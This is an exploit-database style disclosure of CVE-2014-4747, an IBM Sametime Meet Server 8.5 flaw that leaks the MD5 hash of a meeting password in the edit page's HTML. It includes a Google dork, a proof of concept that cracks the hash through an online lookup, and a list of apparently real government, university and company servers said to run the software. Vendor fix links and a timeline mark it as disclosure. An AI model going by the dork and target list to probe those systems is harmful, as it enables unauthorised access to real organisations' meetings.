IBM Sametime Meet Server 8.5 Password Disclosure

# Exploit Title:   IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork:     intitle:"Meeting Center - IBM Lotus Sametime"
# Date:     11/08/2014
# CVSS Score:     http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID:     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID:     http://osvdb.org/109443
#
# Author:     Adriano Marcio Monteiro
# E-mail:     adrianomarciomonteiro@gmail.com
# Blog:     http://www.brazucasecurity.com.br
#   
# Vendor:     http://www.ibm.com
# Software:     http://www.ibm.com/sametime
# Version:     8.5.1
# Advisory:     https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#   
# Test Type:     Black Box
# Tested on:     Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of  Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerabilty

  Password Disclosure
  Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.



[0x01] Exploit Description

  On the page that allows editing a meeting is possible to retrieve the MD5 hash of the password of the meeting just by reading the HTML source code of the page.



[0x02] PoC - Proof of Concept

  For exploit this vulnerability you only need to analyze the source code of  page.
  
  http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536

  [...]
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
  [...]

  http://www.md5online.org
  E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA

  Examples:

      http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
      http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
      http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
      http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
      http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
      http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
      http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
      http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
      http://comware.net/stconf.nsf/frmConference?Openform
      https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
      https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
      http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
      https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

  Apply the procedures described in the follow link:
  http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

  18/07/2014 - Vulnerabilities discovered
  19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
  23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

  http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
  http://www.securityfocus.com/bid/68823
 


[0x06] References

  Information Leakage
  https://www.owasp.org/index.php/Information_Leakage

  CWE-200: Information Exposure
  http://cwe.mitre.org/data/definitions/200.html



[0x07] Bibliography

  http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent



[end]